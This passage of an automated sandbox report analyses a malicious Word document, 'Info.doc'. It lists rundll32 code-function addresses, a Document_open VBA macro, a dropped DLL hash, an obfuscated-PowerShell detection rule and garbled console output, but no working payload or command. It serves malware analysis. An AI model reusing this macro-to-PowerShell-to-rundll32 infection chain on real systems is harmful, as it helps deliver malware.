                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00387C4A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038C44B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038BCA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038E499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00399494
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0039C48F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038A4E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00395CCB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00395136
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00386D2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00383521
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038DD24
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00391913
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038510E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00397D78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0039BD5E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038415F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00384DB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003941AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003875A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0039B59B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0039A59F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00387D94
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00392DE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00382A18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00380A00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00392A00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A1600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00398279
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038367A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00391E7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038CA68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00386A6F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00396E50
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00385EBA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A12B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003806B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003966AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003902A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038628A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003996EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00398EE2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00386EE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003906D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00396AD5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038D2C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038C6CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0039473C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038AF28
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00397713
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00388B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038EF04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038FB05
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038D760
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00394F60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038CF5B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00388355
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00394B48
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00385742
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00392B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00381B46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0039BFB0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038F3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003833AB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00385BAC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038A7A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00382F97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038E380
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038ABF8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003877F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003827F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00399BE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038B7C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F6005
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F3C28
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00204460
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00200065
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001FC44B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F7C4A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00201079
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001FE871
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001FE499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0020C48F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00209494
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001FBCA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00205CCB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001FA4E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F510E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00205136
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00201913
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F6D2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001FDD24
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F3521
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F415F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00207D78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0020BD5E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F7D94
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002041AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F4DB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0020B59B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0020A59F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F75A0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_00202DE1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001F2A18
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001F0A00
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_00202A00
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_00211600
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_00208279
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_00201E7D
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001F367A
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001F6A6F
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_00206E50
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001FCA68
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002002A0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002066AE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001F628A
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002112B6
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001F5EBA
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001F06B6
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_00208EE2
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002096EA
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001FC6CE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001FD2C9
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002006D1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_00206AD5
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001F6EE4
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001F8B16
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001FFB05
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001FEF04
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0020473C
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_00207713
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001FAF28
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_00204F60
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001FCF5B
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001F8355
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001F1B46
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001F5742
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_00202B45
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_00204B48
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001FD760
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001F2F97
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0020BFB0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001FE380
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001FF3B5
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001F5BAC
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001F33AB
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001FA7A2
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_00209BE4
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001FB7C2
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001FABF8
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001F27F4
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001F77F0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00196005
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00193C28
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0019C44B
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00197C4A
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A1079
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0019E871
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A4460
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A0065
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0019E499
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A9494
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001AC48F
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0019BCA5
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A5CCB
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0019A4E1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A1913
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0019510E
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A5136
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00196D2C
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00193521
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0019DD24
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001ABD5E
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0019415F
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A7D78
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001AB59B
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001AA59F
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00197D94
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00194DB8
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A41AD
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001975A0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A2DE1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00192A18
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00190A00
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A2A00
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001B1600
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A6E50
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0019367A
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A8279
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A1E7D
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0019CA68
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00196A6F
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0019628A
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00195EBA
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001B12B6
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001906B6
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A66AE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A02A0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A06D1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A6AD5
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0019D2C9
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0019C6CE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A96EA
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A8EE2
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00196EE4
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A7713
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00198B16
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0019FB05
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0019EF04
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A473C
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0019AF28
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0019CF5B
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00198355
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A4B48
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00195742
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00191B46
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A2B45
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0019D760
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A4F60
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00192F97
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0019E380
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001ABFB0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0019F3B5
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001933AB
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00195BAC
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0019A7A2
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0019B7C2
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0019ABF8
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001977F0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001927F4
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001A9BE4
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00276C05
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00276E8A
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00274121
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0028533C
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0027FB04
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00279716
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0027E360
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00285748
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00284DAD
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0028C19B
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0028A7E4
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_002783F0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00274828
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00271600
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00283600
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00273618
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0027766F
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00285060
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00280C65
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0027D668
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00281C79
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00288E79
                      Source: Info.doc | OLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentation | OLE, VBA macro: Module J84qpb_vkjnc1hq, Function Document_open
                      Source: Info.doc | OLE indicator, VBA macros: true
                      Source: Joe Sandbox View | Dropped File: C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll 2ED12B3974BE2D729CB7EFDDDFCED6B61E5B00A56EBE27A6CF3FBB080880F2F0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 1000B078 appears 46 times
                      Source: 00000005.00000002.2095373309.0000000000106000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                      Source: 00000005.00000002.2095728605.0000000001F14000.00000004.00000040.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                      Source: powershell.exe, 00000005.00000002.2105210846.000000001CCC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100613650.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097379165.0000000002060000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099147774.0000000001E80000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
                      Source: classification engine | Classification label: mal100.troj.evad.winDOC@42/15@1/4
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$Info.doc
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRBCB9.tmp
                      Source: Info.doc | OLE indicator, Word Document stream: true
                      Source: Info.doc | OLE document summary: title field not present or empty
                      Source: Info.doc | OLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exe | Console Write: ............>........................... .........................%.......%.............#...............................h.......5kU.......%.....
                      Source: C:\Windows\System32\msg.exe | Console Write: ............>...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......H.%.....L.................%.....
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................................................`I.........v.....................K......(.f.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......h...............u.............}..v....H>......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j..... u...............u.............}..v.....>......0...............(.f.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......................u.............}..v.....K......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......f...............u.............}..v....8L......0.................f.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....#..................j......................u.............}..v.....y......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....#..................j..... u...............u.............}..v....xz......0.................f.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....7...............N{.j.....Ff...............u.............}..v.....!......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....7................z.j....x"................u.............}..v....."......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....C...............N{.j.....Ff...............u.............}..v.....)......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....C................z.j....x*................u.............}..v.....*......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....O...............N{.j.....Ff...............u.............}..v.....1......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....O................z.j....x2................u.............}..v.....2......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v.....7......0................Cf.....(.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....[................z.j.....7................u.............}..v....H8......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.8.............}..v....X<......0................Cf.....$.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....g................z.j.....=................u.............}..v.....=......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....s...............N{.j.....Ff...............u.............}..v....XD......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....s................z.j.....E................u.............}..v.....E......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................N{.j.....Ff...............u.............}..v....XL......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................z.j.....M................u.............}..v.....M......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................N{.j.....Ff...............u.............}..v....XT......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................z.j.....U................u.............}..v.....U......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X\......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................z.j.....]................u.............}..v.....]......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................N{.j.....Ff...............u.............}..v....Xd......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................z.j.....e................u.............}..v.....e......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................N{.j.....Ff...............u.............}..v....Xl......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................z.j.....m................u.............}..v.....m......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................N{.j.....Ff...............u.............}..v....Xt......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................z.j.....u................u.............}..v.....u......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X|......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................z.j.....}................u.............}..v.....}......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X.......0...............................................
